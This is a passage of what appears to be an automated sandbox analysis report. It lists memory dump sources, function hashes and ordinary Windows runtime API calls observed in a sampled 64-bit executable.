                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                          • Opcode ID: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
                                                                                                                                                                          • Instruction ID: 5e0d7db3bf0052c242b0736caba6a9ecebaed5e214cf2574d466661339af79d2
                                                                                                                                                                          • Opcode Fuzzy Hash: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A214C20E8F74242FA94B32D96D5939E2925F44BB0FD60735E93E47AF6DE6CA4814330
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                          • Opcode ID: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
                                                                                                                                                                          • Instruction ID: 0fbc2b2357aacfa26fd34384af337e768f803e5df9220d0cbd5efca8d6808b6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2611D331B19A4182E750AB5AF854F29A7A0FB88BE4F810235EA5D837B4CF3CD9548750
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiStringWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2829165498-0
                                                                                                                                                                          • Opcode ID: 74732c29140062126d5773efcb4aea144f1b9c16ea490256da8086c255d1fef1
                                                                                                                                                                          • Instruction ID: 035278dd0488068e5d0b7be5c6b13ff4f484ad3e7cf87e3cd90a8a69d31bb9dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 74732c29140062126d5773efcb4aea144f1b9c16ea490256da8086c255d1fef1
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B81D132A1A74186EB20AF19A445B69F6E2FF447E4F850231EA5D47BF4EF3CD9418720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
                                                                                                                                                                          • Instruction ID: 07d7ccabff56743dc01dd25864f0db8782390b965ab97940163d2f8c67741666
                                                                                                                                                                          • Opcode Fuzzy Hash: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
                                                                                                                                                                          • Instruction Fuzzy Hash: 3951D82290E68785E756BF2CD0547BDBBA29F01B44FCB8031C68D073B5DE2DA905C725
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00007FF7ABC42225
                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC42244
                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC42266
                                                                                                                                                                          • sys_get_time.LIBCPMT ref: 00007FF7ABC42281
                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC422A7
                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC422BF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 184115430-0
                                                                                                                                                                          • Opcode ID: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
                                                                                                                                                                          • Instruction ID: c50572ebe117368415b02ff051e913e1461ec5895e4dd0417476c1d588da5bde
                                                                                                                                                                          • Opcode Fuzzy Hash: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
                                                                                                                                                                          • Instruction Fuzzy Hash: 1641A336929A02C6E774AF18D445A38F372FB04B55F814031D64D8A6B8EF3CE981CB20
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                          • Opcode ID: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
                                                                                                                                                                          • Instruction ID: bb16b52962e363b6c73175d94af957691bc4ee36039a47bfaddc8199af426b31
                                                                                                                                                                          • Opcode Fuzzy Hash: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
                                                                                                                                                                          • Instruction Fuzzy Hash: 85318622A0EA0285EA19FF1DE450979F3A1FB44798FDD0131EA8D076B5DE3CE445C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                          • Opcode ID: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
                                                                                                                                                                          • Instruction ID: 644d5f5a1f7860070aad0bc16a3434af5cf0bbd894a944a539f9eaed0015d775
                                                                                                                                                                          • Opcode Fuzzy Hash: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
                                                                                                                                                                          • Instruction Fuzzy Hash: 2731B326A0AA4285FA25FF1DE450979F7A1FB84B98FCA0131EA5D077B5DE3CE441C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                          • Opcode ID: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                          • Instruction ID: 056d0d70a0a6f46f33e6d75d56a5d6339b58b6b63fd657073b50843a589c414a
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D317562B0AA0281EB15BB1DE48097AF361FB84B94F990132DA4D077B6DE3CE445C764
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                          • Opcode ID: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
                                                                                                                                                                          • Instruction ID: 721bca20f207cc23d28269371ecd223abbebd4904394671203aa1957309197ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
                                                                                                                                                                          • Instruction Fuzzy Hash: 5631A722A0AE4282FB59BB5DD480979E750EF447A4FC90532DE1D476F5DE7CE44AC320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 3523768491-393685449
                                                                                                                                                                          • Opcode ID: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                          • Instruction ID: 2524141ceca2a61c1547e7e6db8153b6af41500cedc3a463141210f565c778aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                          • Instruction Fuzzy Hash: CEE1D57290A7818AE710EF68D489BADB7A2FB45748F920135DE8D47676CF3CE681C710
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5710B
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC57141
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5716E
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5717F
                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC57190
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC571AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                          • Opcode ID: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
                                                                                                                                                                          • Instruction ID: 365c3c2a6a340f3c267d817b18b3659d7017bc511537e94f1f9ac55192317b2c
                                                                                                                                                                          • Opcode Fuzzy Hash: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B118120B4B35342FA9477299A9193AD1929F447B0F860735D83E067F6DE2CA4814330
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 2967684691-1405518554
                                                                                                                                                                          • Opcode ID: a721d668b7db89a30cc0786e94b9041a1d78a689daa74e6852f3cdc1800c5de8
                                                                                                                                                                          • Instruction ID: a7bbffb83612138339a4883b247665e92c4e2288d6ab162cbabb1ea124a60ee4
                                                                                                                                                                          • Opcode Fuzzy Hash: a721d668b7db89a30cc0786e94b9041a1d78a689daa74e6852f3cdc1800c5de8
                                                                                                                                                                          • Instruction Fuzzy Hash: A541AD22B0AB4189FB14EFB8D450ABDB364EF40788F854034DE4D66AB6DF38D656D324
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                          • String ID: exists$status
                                                                                                                                                                          • API String ID: 1686256323-1990824825
                                                                                                                                                                          • Opcode ID: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
                                                                                                                                                                          • Instruction ID: eb5bb2bf4e70b39b106f74748c6d10ae147855c7941d25657201e2fc3a658b9d
                                                                                                                                                                          • Opcode Fuzzy Hash: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B41FC23F15A429AFB00EBB8D4016FDA372BB44758F814635DE5D22AF9EE38D546C350
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                          • Instruction ID: 6d8bf8dabd1ab5d133c159f9e36bba7329598a3b9bf02b29fede3bfc543e8754
                                                                                                                                                                          • Opcode Fuzzy Hash: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                          • Instruction Fuzzy Hash: E0F09661B1AB4292FB10AB28E458B399731FF84B65FD50235D67D462F4DF2CD189CB20
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                          • Opcode ID: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                          • Instruction ID: 7a2fb250236abac861cae26ae33399b5b52d1af86ebb80eb8d7ba088bc578d72
                                                                                                                                                                          • Opcode Fuzzy Hash: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                          • Instruction Fuzzy Hash: 35B1D331E0B64282EA65FB199048A3DF792EF44B85F9B8436DE4D077B5DE3CE6418320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 262959230-0
                                                                                                                                                                          • Opcode ID: 4c4ed421752b83d501d5bb88631d23af3d185d3576346463c074d9e7fe7b9955
                                                                                                                                                                          • Instruction ID: 5b18246aa6e619dc8f517f09c85f1746587e7c1bb37875a926e7ee4a60f2f8d7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c4ed421752b83d501d5bb88631d23af3d185d3576346463c074d9e7fe7b9955
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A417C25A1674186EB14BF39D415B78A292FF44BB4F850634D96D4B7F0EF3CD2818320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                          • Opcode ID: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                          • Instruction ID: cc1f4c23770ad6dbbac9e32b9a4648086754ee1b2d69f835f5ce4506cdba73e8
                                                                                                                                                                          • Opcode Fuzzy Hash: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C118262F9DA1352F658317CE4D2B79D5406F58364FC70734E67E162F68F2C68408121
                                                                                                                                                                          APIs
